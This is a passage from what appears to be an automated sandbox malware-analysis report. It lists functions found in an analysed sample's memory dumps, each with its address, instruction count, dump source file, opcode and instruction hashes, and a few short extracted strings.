                                          • Opcode Fuzzy Hash: 402cce90e25b01247342cbba6b90e33caf778f06143ccfbbf182d61300e30ded
                                          • Instruction Fuzzy Hash: 08C092F2E02440AFEB018E19CE49AEA7762EBB4341F058434B907AB154E731CC62E795
                                          Function 069CD410 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b97f07e99cd2dfe03aae3cdc5b783246f8dcc3062a5ae41142fb3afeaa5c1b8f
                                          • Instruction ID: c8d2ebcd9ad5db2696e18434672f5827d6ed960b90ae483260c01d1098f175a9
                                          • Opcode Fuzzy Hash: b97f07e99cd2dfe03aae3cdc5b783246f8dcc3062a5ae41142fb3afeaa5c1b8f
                                          • Instruction Fuzzy Hash: A7C04C666496816EEB124A745D09B913F116F52701F151184B2524B1D195511444DA76
                                          Function 069C9166 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 085a710215604231895e259341c1d66b98f102410f360ee0f11f8762094b8a17
                                          • Instruction ID: 829739e60ec441a0c98563ef26a7f2ea5a9cb1748c4a34da5779e5f0536c3064
                                          • Opcode Fuzzy Hash: 085a710215604231895e259341c1d66b98f102410f360ee0f11f8762094b8a17
                                          • Instruction Fuzzy Hash: 69C08CB06042449FF754AF10E0A876E7F32D759725F20C41ED1072BE98CE354C0ACB62
                                          Function 06B56F41 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ce5ae456980ceca8b63ac49fb02e1d011e3c9800d7149cde5659356a72c08db
                                          • Instruction ID: 10f292f7631bd88ddbfea0f19ce6f9e1830c545221be84f16dd46e7e5ef19b8c
                                          • Opcode Fuzzy Hash: 6ce5ae456980ceca8b63ac49fb02e1d011e3c9800d7149cde5659356a72c08db
                                          • Instruction Fuzzy Hash: A9B092850192C00AC2862A255C103946AA428921003C714C3E4A08A462840809549232
                                          Function 06B59410 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                          Function 06B5D500 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79750ac3570be5a2e84a514cff61c5117428fb2403f6129b4ad9c5c8987edcc7
                                          • Instruction ID: 7e228c4360e0210b35731f52b8c4b59a50bcb311d59ba9faadd89df0e3bb9754
                                          • Opcode Fuzzy Hash: 79750ac3570be5a2e84a514cff61c5117428fb2403f6129b4ad9c5c8987edcc7
                                          • Instruction Fuzzy Hash: C2B09232000248EB87019B84E844959BB69AB58700B148029A6090A121CB72A862DAD4

                                          Non-executed Functions

                                          Function 06A239D9 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJbq$Te]q$xb`q
                                          • API String ID: 0-1930611328
                                          • Opcode ID: 4a479c2788935ffd6698be614e3a67a98631134faa59add6879920e46ab90d4c
                                          • Instruction ID: 4b1947142373b0aa63fdff0bc427c96bb1391b67614e220b82efb5e4f4d73a6b
                                          • Opcode Fuzzy Hash: 4a479c2788935ffd6698be614e3a67a98631134faa59add6879920e46ab90d4c
                                          • Instruction Fuzzy Hash: D0B18875E416198FDB58DF6AC944ADDBBF2BF89300F14C0AAD809AB365DB305A81CF50
                                          Function 069CFA78 Relevance: 2.8, Strings: 2, Instructions: 334COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$,aq
                                          • API String ID: 0-1929014441
                                          • Opcode ID: 68ed040ab21d335d040800f2237efe1825b3a18cddf3a1571bc6f8010cd5d98f
                                          • Instruction ID: 0e9f239cca676bfaaad8b3fa282af6f09176c83edd957b3d1d5f9972b2e16bc5
                                          • Opcode Fuzzy Hash: 68ed040ab21d335d040800f2237efe1825b3a18cddf3a1571bc6f8010cd5d98f
                                          • Instruction Fuzzy Hash: 8ED12A75A00609CFDB54DF69C584AAAB7F6FF88320F25C499E4059B762DB30EC41CB51
                                          Function 06950006 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: 82a29293363bb5dc10bcabec5b5877db34675b8b153ada5b4684d2dbee1b94ea
                                          • Instruction ID: 9864891637c6fd198481ba53a1b201c0d9a5b28c5b9c32ca60a20948580e4ef1
                                          • Opcode Fuzzy Hash: 82a29293363bb5dc10bcabec5b5877db34675b8b153ada5b4684d2dbee1b94ea
                                          • Instruction Fuzzy Hash: 92816E70E806459FD749DF7AE980B8A7BF2FF89304F14C46AD0049B269DB38590ACB51
                                          Function 06950040 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: d8078925b96f2f8c2c2b7b08d065534205b46285cc3c58b25135246e768add5c
                                          • Instruction ID: d7e48d61b96f79817bcb78d50d145f3b8d91fa7bb57ab60a2bc3b936e6c79b06
                                          • Opcode Fuzzy Hash: d8078925b96f2f8c2c2b7b08d065534205b46285cc3c58b25135246e768add5c
                                          • Instruction Fuzzy Hash: CE711B70E806099FD748DF7AE940B9ABBF2FF88304F14D42AD00497369DB74590ADB51
                                          Function 06B5E8B8 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq
                                          • API String ID: 0-600464949
                                          • Opcode ID: e36e915aab47dbd7d7afb170dbf072ca8e4059a478893245509fa72deab42d0f
                                          • Instruction ID: 4f86c19cf944657b8061bd7d934841bbad027d259669335da8ed0b29584f4162
                                          • Opcode Fuzzy Hash: e36e915aab47dbd7d7afb170dbf072ca8e4059a478893245509fa72deab42d0f
                                          • Instruction Fuzzy Hash: 98326BB4A006158FDB94DF69D4947AEFBF2FB88300F158569E95AD7381CB30E902CB91
                                          Function 069CB1E0 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: 31308dbacfc8629d0db2c78239ca48795ba9e05395575998ba095afcc6107e35
                                          • Instruction ID: 20ee4fa2c16d108fce032ab786ea31870c122ca05dae530d96c3bbbe7e914eb1
                                          • Opcode Fuzzy Hash: 31308dbacfc8629d0db2c78239ca48795ba9e05395575998ba095afcc6107e35
                                          • Instruction Fuzzy Hash: 52C15870E44218CFDB94DFA9D885BADBBF2FB89310F608069D508A7759DB345985CF02
                                          Function 069CB1F0 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: 54c10d2cee80f665eb2f485a27d7e170d2ef4081b16c6dc0099a497b7e6540ff
                                          • Instruction ID: 579e1e2b9eaa17d3b447baaa2a3739ec505dba47d29874a379c7de2f0e99923e
                                          • Opcode Fuzzy Hash: 54c10d2cee80f665eb2f485a27d7e170d2ef4081b16c6dc0099a497b7e6540ff
                                          • Instruction Fuzzy Hash: F0B14870E44218CFEB54CFA9D895BADBBF2BB89310F609469D108A7659DB345C86CF02
                                          Function 069C2599 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 1
                                          • API String ID: 0-2212294583
                                          • Opcode ID: 8d206d0eb99a2df3be3984eb63ca77a0135b9a22f7d774e50016d43df88971e3
                                          • Instruction ID: d5bf5ee146f9009c775bc00ca51273a0f4a83ff911a7445286e477d9375262c6
                                          • Opcode Fuzzy Hash: 8d206d0eb99a2df3be3984eb63ca77a0135b9a22f7d774e50016d43df88971e3
                                          • Instruction Fuzzy Hash: E5416271E05A588FEB5CCF6B9D4069EFAF3AFC9311F14C1BA940CAA215EB3006458F11
                                          Function 069C0D80 Relevance: .4, Instructions: 431COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04ed4bd714a7b6fa5157aabb6011a7bb329902e39e45006e2eb2e94167fb1652
                                          • Instruction ID: bd71efe3530d02dac292540d4948f49f5308593a791ad79a17d5a25de36fca7d
                                          • Opcode Fuzzy Hash: 04ed4bd714a7b6fa5157aabb6011a7bb329902e39e45006e2eb2e94167fb1652
                                          • Instruction Fuzzy Hash: 2912B271E006198FDB54CFAAC98069DFBF2BF88314F24C569D418EB21AD734A986CF54
                                          Function 06CEA750 Relevance: .3, Instructions: 266COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7abbb98e1aba8e04e1f97178bac623a0610a34404ebd5c934ce087b13436bcda
                                          • Instruction ID: 0b96a075d2093c01f6c5b859091603cb587499fcbe8f71ad6c3ffad6003d8bba
                                          • Opcode Fuzzy Hash: 7abbb98e1aba8e04e1f97178bac623a0610a34404ebd5c934ce087b13436bcda
                                          • Instruction Fuzzy Hash: 8BB14B70E44218DFDB94DFA9E884B9EBBB2FB89300F60906DD409AB355CB345985CF51
                                          Function 00DACFE4 Relevance: .3, Instructions: 264COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d8f5c8bb2f661c564b1a08329ff7ca2570832ff7279d7919895688e42167204
                                          • Instruction ID: 5164e01b56a4dbd6d034993c3e60286e5724717ac48324a0773cd576715888b9
                                          • Opcode Fuzzy Hash: 3d8f5c8bb2f661c564b1a08329ff7ca2570832ff7279d7919895688e42167204
                                          • Instruction Fuzzy Hash: A2A16232E002198FCF05DFB5C84459EB7B2FF89300B2985BAE806BB251DB71E955CB60
                                          Function 06CEA741 Relevance: .3, Instructions: 252COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32b978c6d1c3ce2756c9faf9ba414824c28797bf65c2bc8cd599388bcd1fab13
                                          • Instruction ID: 3a3b25de206f41a96af60fab517034de37fc23b2b0d7a1bf6acf10bb6ebace32
                                          • Opcode Fuzzy Hash: 32b978c6d1c3ce2756c9faf9ba414824c28797bf65c2bc8cd599388bcd1fab13
                                          • Instruction Fuzzy Hash: 7FB13C70E04218DFDB94DFA9E884B9EBBB2FB89300F60906DE419AB355CB345985CF51
                                          Function 06CD76B8 Relevance: .2, Instructions: 245COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad4db8e3419313200bc589981b6086039c444b3c9651be6590a4ae39603b4532
                                          • Instruction ID: 9ae1643226b3d4cdbc3a9dab33a27d3b523820923a75329866a0a73512d63127
                                          • Opcode Fuzzy Hash: ad4db8e3419313200bc589981b6086039c444b3c9651be6590a4ae39603b4532
                                          • Instruction Fuzzy Hash: CBB14870E05218DFDB94DFA5D854BEDBBF2FB49300F6090AAD109AB291CB345A85CF52
                                          Function 06CEADA9 Relevance: .2, Instructions: 236COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3d1d8997b2d7b608bd39e8b19efa97dc250512fcc9be2470072acbac9afb9a5
                                          • Instruction ID: e8e60541f0c5726def15ff35fce67a6af1d3536da3fd05ec4a02eb8963266620
                                          • Opcode Fuzzy Hash: f3d1d8997b2d7b608bd39e8b19efa97dc250512fcc9be2470072acbac9afb9a5
                                          • Instruction Fuzzy Hash: B5A13870A44218DFDB94DFA9D444BAEBBF2FB89304F609129E409AB394CB389D45CF51
                                          Function 06CEADB8 Relevance: .2, Instructions: 236COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 305caa0e2b8136f1e5843d3d27caccae0f98ef785c64662f39551326acac6d3b
                                          • Instruction ID: 48b5b8a55719b4d455d1919089dfd70caa91a35c3db65fcac3dfeaed2ce8c106
                                          • Opcode Fuzzy Hash: 305caa0e2b8136f1e5843d3d27caccae0f98ef785c64662f39551326acac6d3b
                                          • Instruction Fuzzy Hash: C2A14970A44218DFDB94DFA9D444BAEBBF2FB89304F609129E409AB394CB389D45CF51
                                          Function 06CEAA54 Relevance: .2, Instructions: 235COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 618ae3d0b0d4e9d7afc5b631e235a290cc01c5bccbd6a78a85df12c6d3c56045
                                          • Instruction ID: c16a4e4eb99a3dc1c2b37ae6e648fb9daa669591466e28bb9135cf7d891c35d8
                                          • Opcode Fuzzy Hash: 618ae3d0b0d4e9d7afc5b631e235a290cc01c5bccbd6a78a85df12c6d3c56045
                                          • Instruction Fuzzy Hash: A2A13C70E04218DFDB94DFA9E884B9EBBB2FB89300F60806DD419AB355CB349985CF51
                                          Function 06E9E2A0 Relevance: .2, Instructions: 226COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053923386.0000000006E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e80000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c691fce291b87221b0e2ad1e1c1422704e7df6530c4bba41262914aa82651bc
                                          • Instruction ID: 99b96a198b6ba5bff739106327cab059c3c2295f7d665ac80eb1502d3adf82fb
                                          • Opcode Fuzzy Hash: 9c691fce291b87221b0e2ad1e1c1422704e7df6530c4bba41262914aa82651bc
                                          • Instruction Fuzzy Hash: 14A1F270D01329CFEFA4DFA9C984B9DBBB1BF48304F11A4A9D609A7241E7705985CF60
                                          Function 06CEAB1D Relevance: .2, Instructions: 224COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b5597b5c0ececb507e9d4043ce65eca5d1e5e46cafb3361ff5839e372f112b7
                                          • Instruction ID: 438003aee58e644c0e1fc09a9844c8b330f4e984486f2c7f8c703256786bf3d0
                                          • Opcode Fuzzy Hash: 4b5597b5c0ececb507e9d4043ce65eca5d1e5e46cafb3361ff5839e372f112b7
                                          • Instruction Fuzzy Hash: 66A12B70E44218DFDB94EFA9E880B9EBBB2FB89300F60906DD419AB355CB345985CF51
                                          Function 06CD7EC0 Relevance: .2, Instructions: 218COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a5e79a35bfc1ab756bc737edaa3d6c273f38bdc28e26edeffaba955464bc29c
                                          • Instruction ID: bc7beaecefac0760cc1d8786825608cc2b8c3d06802a23ca34ef2934065dcce1
                                          • Opcode Fuzzy Hash: 3a5e79a35bfc1ab756bc737edaa3d6c273f38bdc28e26edeffaba955464bc29c
                                          • Instruction Fuzzy Hash: 35914570E45208CFDBA4DF69D484BAEBBF2BB49300F50906AD519A7354DB349989CF50
                                          Function 06CD8065 Relevance: .2, Instructions: 209COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00dffdde30fa6ee02fa1473846a2bdc2485f20d2dab1dd7ecf63d225a22acc4d
                                          • Instruction ID: 1305a6e5d1ffe7d95f985eb3b90db387140a079151050c44bd42d88b1d28bb9c
                                          • Opcode Fuzzy Hash: 00dffdde30fa6ee02fa1473846a2bdc2485f20d2dab1dd7ecf63d225a22acc4d
                                          • Instruction Fuzzy Hash: B2915870E41208CFDBA4DF69D884BAEBBF2FB49300F60906AD519A7354DB349985CF50
                                          Function 069C14A0 Relevance: .2, Instructions: 156COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d98526d982e47962c45e941caec008be722ebc64c75b0d663e8d2944d912e11
                                          • Instruction ID: 6c388d90890ddf9acf841fa7c877ee6e8b11c43531f187c1d46583229aebf4d7
                                          • Opcode Fuzzy Hash: 9d98526d982e47962c45e941caec008be722ebc64c75b0d663e8d2944d912e11
                                          • Instruction Fuzzy Hash: 3E614670E06218DFEB68CF6AD840BDDBBF2BF89310F2485A9D009A7652DB744984CF45
                                          Function 069C14B0 Relevance: .2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58806eaecd627f79bb85980d163aa8bbf48e301bdf549efed20daae23d95911e
                                          • Instruction ID: 2389bbff028bcc7861a4425f350d4da3e43aeb0822363b39096c6821e5dbcb57
                                          • Opcode Fuzzy Hash: 58806eaecd627f79bb85980d163aa8bbf48e301bdf549efed20daae23d95911e
                                          • Instruction Fuzzy Hash: 2F614870E45218CFEB68CF6AD840B9DB7F2BF89310F2085A9D00DA7652DB744984CF05
                                          Function 06CD1EE0 Relevance: .2, Instructions: 151COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b48685afd52e311312bf8047c2dc8f029289db6f5f320fb120d6e8206baa156
                                          • Instruction ID: 10d53df3f8d3b859517c65e4199a396f81ec44bd898188758f29fcd92e285002
                                          • Opcode Fuzzy Hash: 0b48685afd52e311312bf8047c2dc8f029289db6f5f320fb120d6e8206baa156
                                          • Instruction Fuzzy Hash: 945166B0E51208CFEB94DFA9D444BEDBBF2FB49300F64902AD608A7654C778A946CF41
                                          Function 06CD1EF0 Relevance: .1, Instructions: 144COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccddfa2ced1bdfa6e089c2457b7b672bcc1a0e42521ac636b7740bdbe1a44e23
                                          • Instruction ID: 28d6904ba0b9b3ec64916365916e0cb9d037a6f7fe1971e60c66ddca11fab692
                                          • Opcode Fuzzy Hash: ccddfa2ced1bdfa6e089c2457b7b672bcc1a0e42521ac636b7740bdbe1a44e23
                                          • Instruction Fuzzy Hash: EA516A70D45218CFEB94DFAAD444BEDBBF2FB49310F249029D609A7654C734A946CF41
                                          Function 069C0D70 Relevance: .1, Instructions: 127COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e26f394b74f29bace62651d3309e5ebf49075ddb4b29ed3baa592169962fb60
                                          • Instruction ID: 3815e474aae0f003c543c6a20127a70f30f5ba34e9cf959c9d4420f406f3ccaf
                                          • Opcode Fuzzy Hash: 5e26f394b74f29bace62651d3309e5ebf49075ddb4b29ed3baa592169962fb60
                                          • Instruction Fuzzy Hash: F9418871E016189BDB08CFABC94059EFBF7AFC8310F14C07AD508AB224EB3459468F54
                                          Function 06CD61B0 Relevance: .1, Instructions: 110COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08c8209fb16ec90d8b7bfc58a2f0743d87cff5a70614173593aba77d0062eba5
                                          • Instruction ID: 47a7c290a8a506732830758ab8a04f7dcffa676b740656a67faedd4ec1a1cc77
                                          • Opcode Fuzzy Hash: 08c8209fb16ec90d8b7bfc58a2f0743d87cff5a70614173593aba77d0062eba5
                                          • Instruction Fuzzy Hash: 4641E370E05218CFEB58CFAAD848BDDBBF2BB89304F14C1AAD509A7254DB745985CF50
                                          Function 069505C0 Relevance: .1, Instructions: 110COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e2df52eca962615d50f8f6c194d144b9dc97287f843603858b2f0e82d382b96b
                                          • Instruction ID: 53f5ca593ef2bc99b312cbccfa126690908db3c3e7bb805166dae3941c8d0906
                                          • Opcode Fuzzy Hash: e2df52eca962615d50f8f6c194d144b9dc97287f843603858b2f0e82d382b96b
                                          • Instruction Fuzzy Hash: 66512071D056189BEB6CCF2B8D556DAFAF7AFC9310F14C1F9991CA6264EB700A818F40
                                          Function 06CD94E0 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a21560cdd902751c2da5709bc446bb6c2adb99a9aea20d25ef2e08b42ef86294
